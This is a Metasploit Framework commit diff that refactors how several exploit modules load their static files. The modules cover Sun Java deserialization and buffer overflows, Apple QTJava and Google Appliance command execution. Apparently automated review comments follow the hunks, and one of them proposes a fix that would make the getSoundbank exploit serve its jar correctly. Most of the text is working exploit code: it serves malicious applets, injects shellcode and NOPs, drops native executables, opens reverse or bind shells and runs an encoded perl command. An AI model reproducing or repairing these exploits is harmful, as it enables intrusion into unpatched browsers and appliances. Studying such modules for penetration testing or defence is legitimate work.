try not to repeatedly load static files - see #694

git-svn-id: file:///home/svn/framework3/trunk@8166 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-01-19 19:12:42 +00:00
parent a60733c5dd
commit 310be42bfa
6 changed files with 232 additions and 192 deletions


@ -28,7 +28,8 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
Opt::RPORT(69),
OptPath.new('DICTIONARY', [ true, 'The list of filenames', File.join(Msf::Config.install_root, "data", "wordlists", "tftp.txt") ])
OptPath.new('DICTIONARY', [ true, 'The list of filenames',
File.join(Msf::Config.install_root, "data", "wordlists", "tftp.txt") ])
], self.class)
end
@ -41,9 +42,9 @@ class Metasploit3 < Msf::Auxiliary
{
'Msf' => framework,
'MsfExploit' => self,
}
}
)
fd = File.open(datastore['DICTIONARY'], 'r')
fd.read(fd.stat.size).split("\n").each do |filename|
filename.strip!


@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -12,37 +16,37 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize( info = {} )
super( update_info( info,
'Name' => 'Sun Java Calendar Deserialization Exploit',
'Description' => %q{
'Name' => 'Sun Java Calendar Deserialization Exploit',
'Description' => %q{
This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.
The payload can be either a native payload which is generated as an executable and
The payload can be either a native payload which is generated as an executable and
dropped/executed on the target or a shell from within the Java applet in the target browser.
The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16
and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).
},
'License' => MSF_LICENSE,
'Author' => [ 'sf', 'hdm' ],
'Version' => '1',
'References' =>
'License' => MSF_LICENSE,
'Author' => [ 'sf', 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-5353' ],
[ 'OSVDB', '50500'],
[ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ],
[ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],
[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ],
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ]
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ]
],
'Platform' => [ 'win', 'osx', 'linux', 'solaris' ],
'Payload' => { 'Space' => 2048, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
'Platform' => [ 'win', 'osx', 'linux', 'solaris' ],
'Payload' => { 'Space' => 2048, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
[ 'Generic (Java Payload)',
{
# This is a bad hack to force only the generic/shell_bind_tcp and generic/shell_reverse_tcp payloads
'Platform' => ['win'],
@ -50,36 +54,47 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_CMD,
}
],
[ 'Windows x86 (Native Payload)',
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X PPC (Native Payload)',
[ 'Mac OS X PPC (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'Mac OS X x86 (Native Payload)',
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0
'DefaultTarget' => 0
))
end
def exploit
# load the static jar file
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" )
fd = File.open( path, "rb" )
@jar_data = fd.read(fd.stat.size)
fd.close
super
end
def on_request_uri( cli, request )
data = nil
host = nil
@ -90,15 +105,15 @@ class Metasploit3 < Msf::Exploit::Remote
send_redirect( cli, get_resource() + '/', '')
return
end
print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." )
payload = regenerate_payload( cli )
if not payload
print_status( "Failed to generate the payload." )
return
end
if target.name == 'Generic (Java Payload)'
if datastore['LHOST']
host = datastore['LHOST']
@ -110,15 +125,15 @@ class Metasploit3 < Msf::Exploit::Remote
print_status( "Payload will be a Java bind shell on #{cli.peerhost}:#{port}..." )
end
else
if target['Arch'] == ARCH_X86
data = Msf::Util::EXE.to_win32pe( framework, payload.encoded ) if target['Platform'] == 'win'
data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx'
data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx'
data = Msf::Util::EXE.to_linux_x86_elf( framework, payload.encoded ) if target['Platform'] == 'linux'
elsif target['Arch'] == ARCH_PPC
data = Msf::Util::EXE.to_osx_ppc_macho( framework, payload.encoded ) if target['Platform'] == 'osx'
end
if data
print_status( "Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
@ -126,19 +141,19 @@ class Metasploit3 < Msf::Exploit::Remote
print_status( "Failed to generate the executable." )
return
end
end
send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } )
send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } )
return
end
print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." )
print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." )
send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )
handler( cli )
end
def generate_html( data, host, port )
html = "<html><head><title>Loading, Please Wait...</title></head>"
html += "<body><center><p>Loading, Please Wait...</p></center>"
@ -149,13 +164,9 @@ class Metasploit3 < Msf::Exploit::Remote
html += "</applet></body></html>"
return html
end
def generate_jar()
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" )
fd = File.open( path, "rb" )
data = fd.read(fd.stat.size)
fd.close
return data
return @jar_data
end
end
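Review bot: The new exploit method (hunk `@ -50,36 +54,47 @@`) opens the jar with `File.open( path, "rb" )` and only closes it on the success path, so an exception raised by `fd.read` leaks the handle; `@jar_data = File.binread( path )` does the same work in one line and closes the file in every case. The identical open/read/close sequence is added to the new exploit methods of the getSoundbank, setDiffICM, QTJava and Google ProxyStyleSheet modules in this commit, and the same replacement applies there. generate_jar now simply returns @jar_data, which is set only in exploit; if the HTTP server can be brought up without going through exploit the response body would be nil, so a short comment on generate_jar such as `# @jar_data is read once in exploit; this must not be called before that` would help the next reader, assuming that ordering is indeed guaranteed by the framework.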


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -14,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = GreatRanking
#
# This module acts as an HTTP server
@ -26,25 +26,25 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow',
'Description' => %q{
This module exploits a flaw in the getSoundbank function in the Sun JVM.
The payload is serialized and passed to the applet via PARAM tags. It must be
a native payload.
The effected Java versions are JDK and JRE 6 Update 16 and earlier,
JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
The effected Java versions are JDK and JRE 6 Update 16 and earlier,
JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
earlier, and SDK and JRE 1.3.1_26 and earlier.
NOTE: Although all of the above versions are reportedly vulnerable, only
1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
},
'License' => MSF_LICENSE,
'Author' =>
'Author' =>
[
'kf', # Original PoC/exploit
'jduck' # metasploit version
],
'Version' => '$Revision$',
'References' =>
'References' =>
[
[ 'CVE', '2009-3867' ],
[ 'OSVDB', '59711' ],
@ -70,19 +70,19 @@ No automatic targetting for now ...
}
],
=end
[ 'J2SE 1.6_16 on Windows x86',
[ 'J2SE 1.6_16 on Windows x86',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'J2SE 1.6_16 on Mac OS X PPC',
[ 'J2SE 1.6_16 on Mac OS X PPC',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'J2SE 1.6_16 on Mac OS X x86',
[ 'J2SE 1.6_16 on Mac OS X x86',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
@ -93,23 +93,34 @@ No automatic targetting for now ...
'DisclosureDate' => 'Nov 04 2009'
))
end
def exploit
# load the static jar
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar")
fd = File.open(path, "rb")
@jar_data = fd.read(fd.stat.size)
fd.close
super
end
def on_request_uri(cli, req)
# Create a cached mapping between IP and detected target
@targetcache ||= {}
@targetcache[cli.peerhost] ||= {}
@targetcache[cli.peerhost][:update] = Time.now.to_i
if (target.name =~ /Automatic/)
if (target.name =~ /Automatic/)
case req.headers['User-Agent']
when /Windows/i
print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[1]
when /PPC Mac OS X/i
print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[2]
@targetcache[cli.peerhost][:target] = self.targets[2]
when /Intel Mac OS X/i
print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[3]
@ -118,27 +129,27 @@ No automatic targetting for now ...
end
end
# Clean the cache
# Clean the cache
rmq = []
@targetcache.each_key do |addr|
if (Time.now.to_i > @targetcache[addr][:update]+60)
rmq.push addr
end
end
rmq.each {|addr| @targetcache.delete(addr) }
# Request processing
if (not req.uri.match(/\.jar$/i))
# Redirect to the base directory so the applet code loads...
if (not req.uri.match(/\/$/))
print_status("Sending redirect so path ends with / ...")
send_redirect(cli, get_resource() + '/', '')
return
end
# Display the applet loading HTML
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, generate_html(payload.encoded),
@ -148,10 +159,10 @@ No automatic targetting for now ...
})
return
end
# Send the actual applet over
print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, generate_applet(cli, req),
send_response(cli, generate_applet(cli, req),
{
'Content-Type' => 'application/octet-stream',
'Pragma' => 'no-cache'
@ -169,14 +180,18 @@ No automatic targetting for now ...
<!-- <meta http-equiv=refresh content=10 /> -->
</head>
<body>
<applet width='100%' height='100%' code='AppletX' archive='CVE-2009-3867.jar'>
<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
<param name='sc' value='SCODE' />
<param name='np' value='NOPS' />
</applet>
</body>
</html>
|
# ugh.. pain
# finalize the html
jar_name = rand_text_alphanumeric(32)
html.gsub!(/JARNAME/, jar_name)
# add payload
debug_payload = false
pload = ""
pload << "\xcc" if debug_payload
@ -188,11 +203,12 @@ No automatic targetting for now ...
print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
end
html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))
# add nops
nops = "\x90\x90\x90\x90"
html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
#print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))
return html
end
@ -201,7 +217,7 @@ No automatic targetting for now ...
def generate_applet(cli, req)
this_target = nil
if (target.name =~ /Automatic/)
if (target.name =~ /Automatic/)
if (@targetcache[cli.peerhost][:target])
this_target = @targetcache[cli.peerhost][:target]
else
@ -211,13 +227,7 @@ No automatic targetting for now ...
this_target = target
end
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar")
fd = File.open(path, "rb")
data = fd.read(fd.stat.size)
fd.close
return data
end
return @jar_data
end
end
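Review bot: The new line `jar_name = rand_text_alphanumeric(32)` in generate_html yields an archive attribute with no extension, while on_request_uri (hunk `@ -118,27 +129,27 @@`) only serves the applet when `req.uri.match(/\.jar$/i)`, so the browser's request for the archive appears to fall through to the HTML branch instead of receiving the jar. The sibling setDiffICM module in this same commit appends the extension, so this looks like an omission rather than a design choice. Change it to `jar_name = rand_text_alphanumeric(32) + ".jar"`. generate_html begins before the hunk at `@ -169,14 +180,18 @@`.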


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -14,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = GreatRanking
#
# This module acts as an HTTP server
@ -26,24 +26,24 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow',
'Description' => %q{
This module exploits a flaw in the setDiffICM function in the Sun JVM.
The payload is serialized and passed to the applet via PARAM tags. It must be
a native payload.
The effected Java versions are JDK and JRE 6 Update 16 and earlier,
The effected Java versions are JDK and JRE 6 Update 16 and earlier,
JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
earlier, and SDK and JRE 1.3.1_26 and earlier.
NOTE: Although all of the above versions are reportedly vulnerable, only
1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
},
'License' => MSF_LICENSE,
'Author' =>
'Author' =>
[
'jduck'
],
'Version' => '$Revision$',
'References' =>
'References' =>
[
[ 'CVE', '2009-3869' ],
[ 'OSVDB', '59710' ],
@ -70,19 +70,19 @@ No automatic targetting for now ...
}
],
=end
[ 'J2SE 1.6_16 on Windows x86',
[ 'J2SE 1.6_16 on Windows x86',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'J2SE 1.6_16 on Mac OS X PPC',
[ 'J2SE 1.6_16 on Mac OS X PPC',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'J2SE 1.6_16 on Mac OS X x86',
[ 'J2SE 1.6_16 on Mac OS X x86',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
@ -93,23 +93,23 @@ No automatic targetting for now ...
'DisclosureDate' => 'Nov 04 2009'
))
end
def on_request_uri(cli, req)
# Create a cached mapping between IP and detected target
@targetcache ||= {}
@targetcache[cli.peerhost] ||= {}
@targetcache[cli.peerhost][:update] = Time.now.to_i
if (target.name =~ /Automatic/)
if (target.name =~ /Automatic/)
case req.headers['User-Agent']
when /Windows/i
print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[1]
when /PPC Mac OS X/i
print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[2]
@targetcache[cli.peerhost][:target] = self.targets[2]
when /Intel Mac OS X/i
print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[3]
@ -118,27 +118,27 @@ No automatic targetting for now ...
end
end
# Clean the cache
# Clean the cache
rmq = []
@targetcache.each_key do |addr|
if (Time.now.to_i > @targetcache[addr][:update]+60)
rmq.push addr
end
end
rmq.each {|addr| @targetcache.delete(addr) }
# Request processing
if (not req.uri.match(/\.jar$/i))
# Redirect to the base directory so the applet code loads...
if (not req.uri.match(/\/$/))
print_status("Sending redirect so path ends with / ...")
send_redirect(cli, get_resource() + '/', '')
return
end
# Display the applet loading HTML
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, generate_html(payload.encoded),
@ -148,10 +148,10 @@ No automatic targetting for now ...
})
return
end
# Send the actual applet over
print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, generate_applet(cli, req),
send_response(cli, generate_applet(cli, req),
{
'Content-Type' => 'application/octet-stream',
'Pragma' => 'no-cache'
@ -169,14 +169,18 @@ No automatic targetting for now ...
<!-- <meta http-equiv=refresh content=10 /> -->
</head>
<body>
<applet width='100%' height='100%' code='AppletX' archive='CVE-2009-3869.jar'>
<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
<param name='sc' value='SCODE' />
<param name='np' value='NOPS' />
</applet>
</body>
</html>
|
# ugh.. pain
# finalize html
jar_name = rand_text_alphanumeric(32)+".jar"
html.gsub!(/JARNAME/, jar_name)
# put payload into html
debug_payload = false
pload = ""
pload << "\xcc" if debug_payload
@ -188,20 +192,31 @@ No automatic targetting for now ...
print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
end
html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))
# put nops into html
nops = "\x90\x90\x90\x90"
html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
#print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))
return html
end
def exploit
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar")
fd = File.open(path, "rb")
@jar_data = fd.read(fd.stat.size)
fd.close
super
end
def generate_applet(cli, req)
this_target = nil
if (target.name =~ /Automatic/)
if (target.name =~ /Automatic/)
if (@targetcache[cli.peerhost][:target])
this_target = @targetcache[cli.peerhost][:target]
else
@ -211,13 +226,7 @@ No automatic targetting for now ...
this_target = target
end
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar")
fd = File.open(path, "rb")
data = fd.read(fd.stat.size)
fd.close
return data
end
return @jar_data
end
end
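Review bot: The new exploit method is placed between generate_html and generate_applet and, unlike its counterparts in the other modules of this commit, carries no comment on why the jar is read there; a one-liner such as `# read the static jar once at startup; generate_applet serves the cached copy` would make the intent clear. The new `jar_name = rand_text_alphanumeric(32)+".jar"` would read better as `jar_name = rand_text_alphanumeric(32) + ".jar"`, with spaces around the operator as elsewhere in the file. generate_html begins before the hunk at `@ -169,14 +169,18 @@`.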


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -26,18 +26,18 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Apple QTJava toQTPointer() Arbitrary Memory Access',
'Description' => %q{
This module exploits an arbitrary memory access vulnerability in the
Quicktime for Java API provided with Quicktime 7.
Quicktime for Java API provided with Quicktime 7.
},
'License' => MSF_LICENSE,
'Author' =>
'Author' =>
[
'hdm', # Original exploit for Mac OS X PPC / Win32
'kf', # Added support for Mac OS X X86
'ddz' # Discovered bug, provided tips
],
'Version' => '$Revision$',
'References' =>
'References' =>
[
['CVE', '2007-2175'],
['OSVDB', '34178'],
@ -54,100 +54,112 @@ class Metasploit3 < Msf::Exploit::Remote
#
# Problem with generic payloads + regenerate_payload still :(
#
# [ 'Quicktime 7 Automatic',
# [ 'Quicktime 7 Automatic',
# {
# 'Platform' => ['win', 'osx'],
# 'Arch' => [ARCH_X86, ARCH_PPC]
# }
# ],
[ 'Quicktime 7 on Windows x86',
[ 'Quicktime 7 on Windows x86',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'Quicktime 7 on Mac OS X PPC',
[ 'Quicktime 7 on Mac OS X PPC',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'Quicktime 7 on Mac OS X x86',
[ 'Quicktime 7 on Mac OS X x86',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
],
],
# 'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 23 2007'
))
end
def exploit
# load the class data
path = File.join(Msf::Config.install_root, "data", "exploits", "QTJavaExploit.class")
fd = File.open(path, "rb")
@class_data = fd.read(fd.stat.size)
fd.close
super
end
def on_request_uri(cli, req)
# Create a cached mapping between IP and detected target
@targetcache ||= {}
@targetcache[cli.peerhost] ||= {}
@targetcache[cli.peerhost][:update] = Time.now.to_i
if (target.name =~ /Automatic/)
if (target.name =~ /Automatic/)
case req.headers['User-Agent']
when /Windows/i
print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[1]
when /PPC Mac OS X/i
print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[2]
@targetcache[cli.peerhost][:target] = self.targets[2]
when /Intel Mac OS X/i
print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[3]
end
end
# Clean the cache
# Clean the cache
rmq = []
@targetcache.each_key do |addr|
if (Time.now.to_i > @targetcache[addr][:update]+60)
rmq.push addr
end
end
rmq.each {|addr| @targetcache.delete(addr) }
# Request processing
if (not req.uri.match(/\.class$/i))
# Redirect to the base directory so the applet code loads...
if (not req.uri.match(/\/$/))
send_redirect(cli, get_resource() + '/', '')
return
end
# Display the applet loading HTML
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, generate_html(), { 'Content-Type' => 'text/html' })
send_response_html(cli, generate_html(), { 'Content-Type' => 'text/html' })
return
end
# Send the actual applet over
print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream' })
# Handle the payload
handler(cli)
end
def generate_html()
return "<html><head></head><body><applet width='1' height='1' code='QTJavaExploit.class'></applet></body></html>"
end
def generate_applet(cli, req)
this_target = nil
if (target.name =~ /Automatic/)
if (target.name =~ /Automatic/)
if (@targetcache[cli.peerhost][:target])
this_target = @targetcache[cli.peerhost][:target]
else
@ -157,15 +169,12 @@ class Metasploit3 < Msf::Exploit::Remote
this_target = target
end
path = File.join(Msf::Config.install_root, "data", "exploits", "QTJavaExploit.class")
# make a copy..
data = @class_data.dup
fd = File.open(path, "rb")
data = fd.read(fd.stat.size)
fd.close
# 1 = OSX PPC, 2 = OSX X86, 3 = WIN X86
idx_targ = data.index("\x03\x10\xcc\x54")
# 1024 bytes for shellcode
idx_code = data.index("\x03\x10\xf0\x54")
@ -175,34 +184,34 @@ class Metasploit3 < Msf::Exploit::Remote
data = patch_bytecode(idx_code, data, tp.encoded)
data = patch_bytecode(idx_targ, data, "\x01")
end
# Handle Mac OS X x86 / Windows x86
if (this_target.arch.include?(ARCH_X86))
if (this_target.platform.platforms.include?(Msf::Module::Platform::Windows))
tp = regenerate_payload(cli, 'win', ARCH_X86, this_target)
data = patch_bytecode(idx_code, data, tp.encoded)
data = patch_bytecode(idx_targ, data, "\x03")
end
if (this_target.platform.platforms.include?(Msf::Module::Platform::OSX))
tp = regenerate_payload(cli, 'osx', ARCH_X86, this_target)
data = patch_bytecode(idx_code, data, tp.encoded)
data = patch_bytecode(idx_targ, data, "\x02")
end
end
data = patch_bytecode(idx_targ, data, "\x02")
end
end
return data
end
end
def patch_bytecode(off, data, buff)
cnt = 0
off -= 1
while (cnt < buff.length)
cnt += 1
cnt += 1
while (! (data[off-1] == 0x10 && data[off+1] == 0x54))
off+=1
off += 1
end
data[off]=buff[cnt-1]
off += 1
@ -211,5 +220,5 @@ class Metasploit3 < Msf::Exploit::Remote
return data
end
end
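Review bot: The comment `# make a copy..` above the new `data = @class_data.dup` in generate_applet says what but not why; patch_bytecode writes into its data argument in place (`data[off]=buff[cnt-1]`), so without the dup each request would patch the cached class bytes left by the previous one. Suggest `# patch_bytecode modifies data in place, so never hand out the cached @class_data`. Both idx_targ and idx_code come from `data.index`, which returns nil when the marker is absent, and patch_bytecode then fails on `off -= 1` with a NoMethodError; those lines are unchanged context, but `raise "marker not found in class data" unless idx_targ && idx_code` after the two lookups would give a clearer failure. generate_applet continues past the hunk boundary at `@ -157,15 +169,12 @@`.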


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,14 +19,14 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
'Description' => %q{
This module exploits a feature in the Saxon XSLT parser used by
the Google Search Appliance. This feature allows for arbitrary
java methods to be called. Google released a patch and advisory to
java methods to be called. Google released a patch and advisory to
their client base in August of 2005 (GA-2005-08-m). The target appliance
must be able to connect back to your machine for this exploit to work.
must be able to connect back to your machine for this exploit to work.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet netcat-e',
}
},
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
@ -58,24 +58,18 @@ class Metasploit3 < Msf::Exploit::Remote
# Handle incoming requests from the appliance
def on_request_uri(cli, request)
print_status("Handling new incoming HTTP request...")
path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml")
fd = File.open(path, "r")
data = fd.read(fd.stat.size)
fd.close
exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'
data.gsub!(/:x:MSF:x:/, exec_str)
data = @xml_data.gsub(/:x:MSF:x:/, exec_str)
send_response(cli, data)
end
def check
res = send_request_cgi({
'uri' => '/search',
'vars_get' =>
'vars_get' =>
{
'client' => rand_text_alpha(rand(15)+1),
'site' => rand_text_alpha(rand(15)+1),
@ -84,48 +78,54 @@ class Metasploit3 < Msf::Exploit::Remote
'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'
}
}, 10)
if (res and res.body =~ /cannot be resolved to an ip address/)
print_status("This system appears to be vulnerable")
return Exploit::CheckCode::Vulnerable
end
if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)
print_status("This system appears to be patched")
end
print_status("This system is not exploitable")
return Exploit::CheckCode::Safe
end
def exploit
# load the xml data
path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml")
fd = File.open(path, "r")
@xml_data = fd.read(fd.stat.size)
fd.close
print_status("Obtaining the appliance site and client IDs...")
# Send a HTTP/1.0 request to learn the site configuration
res = send_request_raw({
'uri' => '/',
'version' => '1.0'
}, 10)
if !(res and res['location'] and res['location'] =~ /site=/)
print_status("Could not read the location header: #{res.code} #{res.message}")
return
end
m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)
if !(m and m[1] and m[2])
print_status("Invalid location header: #{res['location']}")
return
return
end
print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
start_service
print_status("Requesting a search using our custom XSLT...")
res = send_request_cgi({
'uri' => '/search',
'vars_get' =>
'vars_get' =>
{
'client' => m[2],
'site' => m[1],
@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
'proxyreload' => '1'
}
}, 25)
if (res)
print_status("The server returned: #{res.code} #{res.message}")
print_status("Waiting on the payload to execute...")
@ -143,9 +143,9 @@ class Metasploit3 < Msf::Exploit::Remote
else
print_status("No response from the server")
end
print_status("Shutting down the web service...")
stop_service
end
end
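Review bot: The `# load the xml data` comment on the new exploit method does not say why the read moved here; on_request_uri now substitutes into @xml_data, so the read must complete before start_service, and `# read the template once before start_service; on_request_uri substitutes the payload into @xml_data` would make that ordering explicit. Just below the new lines, `print_status("Could not read the location header: #{res.code} #{res.message}")` runs when res is nil because the guard is `!(res and ...)`, and then raises NoMethodError instead of reporting the failure; that is unchanged context, but `#{res ? "#{res.code} #{res.message}" : 'no response'}` would keep the error path from failing. The new `data = @xml_data.gsub(/:x:MSF:x:/, exec_str)` in on_request_uri is correctly non-destructive, so the cached template is not altered across requests.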